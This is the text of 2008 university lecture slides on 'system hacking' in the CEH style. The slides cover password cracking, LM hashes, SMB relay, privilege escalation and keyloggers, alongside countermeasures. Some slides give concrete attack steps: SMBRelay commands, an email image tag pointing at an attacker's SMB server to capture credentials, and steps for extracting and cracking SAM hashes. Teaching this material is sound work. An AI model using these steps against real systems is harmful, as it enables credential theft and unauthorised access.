module 8 system hacking
DESCRIPTION
TRANSCRIPT
MODULE 8MODULE 8
SYSTEM HACKINGSYSTEM HACKING
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 2/83
ObjectiveObjective Password cracking Password attacks Identifying various password cracking tools Formulating countermeasures for password
cracking Escalating privileges Executing applications Keyloggers and Spywares Spywares and keyloggers countermeasures Hiding files Understanding rootkits The use of Steganography Covering tracks
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 3/83
Module Flow
SYSTEM HACKINGSYSTEM HACKING
CRACKING PASSWORDSCRACKING PASSWORDS
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 5/83
CEH Hacking Cycle
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 6/83
Password Types
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 7/83
Types of Password Attacks
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 8/83
Passive Online Attack: Wire Sniffing
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 9/83
Passive Online Attack: Man-in-the-Middle and Replay Attacks
Somehow get access to the communicationschannel
Wait until the authentication sequence Proxy authentication-traffic No need to brute force
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 10/83
Active Online Attack: Password Guessing
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 11/83
Offline Attacks Offline attacks are time consuming LM Hashes are much more vulnerable due to
smaller key space and shorter length Web services are available Distributed password cracking techniques are
available Mitigations:
Use good passwords Remove LM Hashes Attacker has password database
Password representations must be cryptographically secure
Considerations: Moore’s law
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 12/83
Offline Attacks (cont’d)
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 13/83
Offline Attack: Brute-force Attack
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 14/83
Offline Attack: Pre-Computed Hashes
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 15/83
Syllable Attack/ Rule-based Attack/Hybrid Attack
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 16/83
Distributed Network Attack
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 17/83
Distributed Network Attack (cont’d)
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 18/83
Distributed Network Attack (cont’d)
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 19/83
Non-Technical Attacks
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 20/83
http://www.defaultpassword.com/
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 21/83
http://www.cirt.net/cgi-bin/passwd.pl
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 22/83
Password Mitigation
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 23/83
Administrator Password Guessing
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 24/83
Manual Password Cracking Algorithm
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 25/83
Automatic Password Cracking Algorithm
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 26/83
Performing Automated Password Guessing
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 27/83
Microsoft Authentication
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 28/83
NTLM and LM Authentication on the Wire
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 29/83
What is LAN Manager Hash
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 30/83
LM “Hash” Generation
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 31/83
LM Hash
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 32/83
Salting
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 33/83
PWdump2 and PWdump3
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 34/83
Tool: Rainbowcrack
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 35/83
Password Sniffing Password guessing is a tough task Why not just sniff credentials off the wire as
users log in to a server and then replay them to gain access?
If an attacker is able to eavesdrop on NT/2000 logins, then this approach can spare lot of random guesswork
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 36/83
How to Sniff SMB Credentials
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 37/83
Sniffing Hashes Using LophtCrack
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 38/83
Hacking Tool: NBTDeputy NBTDeputy register a NetBIOS computer name on the
network and is ready to respond to NetBT name-query requests.
NBTdeputy helps to resolve IP address from NetBIOS computer name. It's similar to Proxy ARP.
This tool works well with SMBRelay. For example, SMBRelay runs on a computer as
ANONYMOUS-ONE and the IP address is 192.168.1.10 and NBTDeputy is also ran and 192.168.1.10 is specified. SMBRelay may connect to any XP or .NET server when the logon users access "My Network Places"
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 39/83
Tool: ScoopLM
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 40/83
Hacking Tool: SMBRelayHacking Tool: SMBRelay SMBRelay is essentially a SMB server that can
capture usernames and password hashes from incoming SMB traffic.
It can also perform man-in-the-middle (MITM) attacks.
You must disable NetBIOS over TCP/IP and block ports 139 and 445.
Start the SMBRelay server and listen for SMB packets: c:\>smbrelay /e c:\>smbrelay /IL 2 /IR 2
An attacker can access the client machine by simply connecting to it via relay address using: c:\> net use * \\<capture _ip>\c$
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 41/83
SMB Replay Attacks Trick client computer to request a connection Request connection to the client computer and
collect challenge Return challenge from client computer as own
challenge Wait for response from client computer Return response as own response Best way of fighting SMB replay attack is by
enabling SMB signing in security policy
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 42/83
SMB Replay Attacks
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 43/83
SMBRelay Man-in-the-Middle Scenario
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 44/83
Redirecting SMB Logon to the Attacker Eavesdropping on LM
responses becomes much easier if the attacker can trick the victim to attempt Windows authentication of the attacker's choice
The basic trick is to send an email message to the victim with an embedded hyperlink to a fraudulent SMB server
When the hyperlink is clicked, the user unwittingly sends his credentials over the network
img src=file://attacker_server/null.gif height=1 width=1.
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 45/83
Replay Attack Tool: SMBProxy A “Passing the Hash” tool that works as a proxy You can authenticate to a Windows NT4/2000
server by knowing only the md4 hash You can mount shares and access the registry
and anything a particular user can do with his privileges
It does not work with syskey enabled systems
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 47/83
Tool: LCP Main purpose of the LCP program is user account
passwords auditing and recovery in Windows NT/2000/XP/2003
Features: Account information imports:
Import from local computer Import from remote computer Import from SAM file Import from .LC file Import from .LCS file Import from PwDump file Import from Sniff file
Passwords recovery: Dictionary attack Hybrid of dictionary and brute force attacks Brute force attack
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 48/83
LCP: Screenshot
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 49/83
Tool: Crack
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 50/83
Tool: Access PassView Access PassView tool reveals the database
password of every passwordprotected mdb file that was created with Microsoft Access 95/97/2000/XP
It can be useful if you have forgotten the Access Database password and you want to recover it
There are two ways of getting the password of the mdb file: Drag & Drop Command-line
Limitations: In Access 2000/XP files, this utility cannot recover
passwords that contain morethan 18 characters This utility shows only the main database
password. It cannot recover the user-level passwords
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 51/83
Access PassView: Screenshot
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 52/83
Password Recovery Tool: MS AccessDatabase Password Decoder
The ‘MS Access Database Password Decoder’ utility was designed to decrypt the master password stored in a Microsoft Access database
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 53/83
Tool: Asterisk Logger Asterisk Logger reveals passwords that are stored
behind the asterisks Features:
Displays additional information about the revealed password such as the date/time on which password was revealed, the name of the application that contains the revealed password box, and the executable file of the application
Allows you to save the passwords to HTML file
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 54/83
Tool: Asterisk Key
Asterisk Key shows passwords hidden under asterisks
Features: Uncovers hidden passwords on password dialog
boxes and web pages State-of-the-art password recovery engine: All
passwords are recovered instantly Supports multilingual passwords Full install/uninstall support
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 55/83
Tool: CHAOS Generator
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 56/83
Password Cracking Countermeasures Enforce 8-12 character alphanumeric
passwords Set the password change policy to 30 days Physically isolate and protect the server Use SYSKEY utility to store hashes on disk Monitor the server logs for brute force attacks
on user accounts
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 57/83
Do Not Store LAN Manager Hash in SAM Database
Instead of storing your user account password in cleartext, Windows generates and stores user account passwords by using two different password "hashes"
When you set or change the password for a user account to a password that contains fewer than 15 characters, Windows generate both LAN Manager hash (LM hash) and Windows NT hash (NT hash) of the password
These hashes are stored in the local Security Accounts Manager (SAM) database or in Active Directory
The LM hash is relatively weak compared to the NT hash and so it is prone to fast brute-force attack. Therefore, you may want to prevent Windows from storing an LM hash of your password
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 58/83
LM Hash Backward Compatibility Windows 2000-based servers and Windows
Server 2003-based servers can authenticate users who connect with computers that are running the earlier versions of Windows
Windows 95/98 clients do not use Kerberos for authentication
For backward compatibility, Windows 2000 and Windows Server 2003 support: LAN Manager (LM) authentication Windows NT (NTLM) authentication NTLM version 2 (NTLMv2) authentication
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 59/83
LM Hash Backward Compatibility The NTLM, NTLMv2, and Kerberos all use the NT
hash, also known as the Unicode hash The LM authentication protocol uses the “LM
hash” It is best to prevent storage of the LM hash if
you do not need it for backward compatibility. If your network contains Windows 95, Windows 98, or Macintosh clients, you may experience the following problems if you prevent the storage of LM hashes
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 60/83
How to Disable LM HASH
SYSTEM HACKINGSYSTEM HACKING
Escalating Privileges
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 62/83
Privilege Escalation
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 63/83
Cracking NT/2000 Passwords SAM file in Windows NT/2000 contains the user
names and encrypted passwords. The SAM file is located at %systemroot%\system32\config directory
The file is locked when the OS is running Booting to an alternate OS
NTFSDOS (www.sysInternals.com) will mount any NTFS partition as a logical drive
Backup SAM from the Repair directory Whenever rdisk /s is run, a compressed copy of
the SAM called SAM._ is created in %systemroot%\repair Expand this file using c:\>expand sam._sam
Extract the hashes from the SAM Use LOphtcrack to hash the passwords
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 64/83
Active@ Password Changer
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 65/83
Active@ Password Changer: Screenshots 1
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 66/83
Active@ Password Changer: Screenshots 2
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 67/83
Active@ Password Changer: Screenshots 3
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 68/83
Privilege Escalation Tool: x.exeThis tool, when executed on remote systems, creates a user called “X” with a password of “X” and adds the user to the administrator’s group
SYSTEM HACKINGSYSTEM HACKING
Executing Applications
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 70/83
Tool: psexec Lets you execute processes on other systems remotely Launches interactive command prompts on remote
systems
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 71/83
Tool: remoexec
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 72/83
Tool: Alchemy Remote Executor
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 73/83
Emsa FlexInfo Pro Emsa FlexInfo Pro is a system information and
diagnostics tool that allows you to access a system details and settings
It includes a real-time CPU and memory graph, as well as CPU speed test and memory test tools
It includes several useful networking utilities (Bandwidth Monitor, Ping, Whois etc.) as well as an atomic time synchronizer, a browser popup blocker, and a basic keylogger
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 74/83
Emsa FlexInfo Pro: Screenshot
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 75/83
Keystroke Loggers If all other attempts to sniff out domain
privileges fail, then a keystroke logger is the solution
Keystroke loggers are stealth software packages that are placed between keyboard hardware and the operating system, so that they can record every keystroke
There are two types of keystroke loggers Software-based Hardware-based
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 76/83
Revealer Keylogger Revealer Keylogger tool records keyboard
inputs Revealer Keylogger's powerful log engine logs
any language on any keyboard and perfectly handles dead-keys
Features: Powerful log engine Full invisible mode Password protection Send log files via e-mail
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 77/83
Revealer Keylogger: Screenshot
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 78/83
Hacking Tool: Hardware Key Hacking Tool: Hardware Key LoggerLogger
The Hardware Key Logger is a tiny hardware device that can be attached in between a keyboard and a computer.
It keeps a record of all key strokes typed on the keyboard. The recording process is totally transparent to the end user.
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 79/83
Hardware Keylogger: Output
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 80/83
What is Spyware? Spyware is a program that records computer
activities on a machine Records keystrokes Records email messages Records IM chat sessions Records websites visited Records applications opened Captures screenshots
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 81/83
Spyware: Spector Spector is spyware that records everything that
one does on the Internet Spector automatically takes hundreds of
snapshots every hour, like a surveillance camera
Spector works by taking a snapshot of whatever is on the computer screen and saves it away in a hidden location on the system’s hard drive
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 82/83
Keylogger Countermeasures Install Antivirus software and keep the
signatures up to date Install a Host-based IDS such as Cisco CSA
agent which can monitor your system and disable the installation of keyloggers
Keep your hardware systems secure in a locked environment
Frequently check the keyboard cables for attached connectors
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 83/83
Anti-Keylogger This tool can detect keylogger installations and
remove them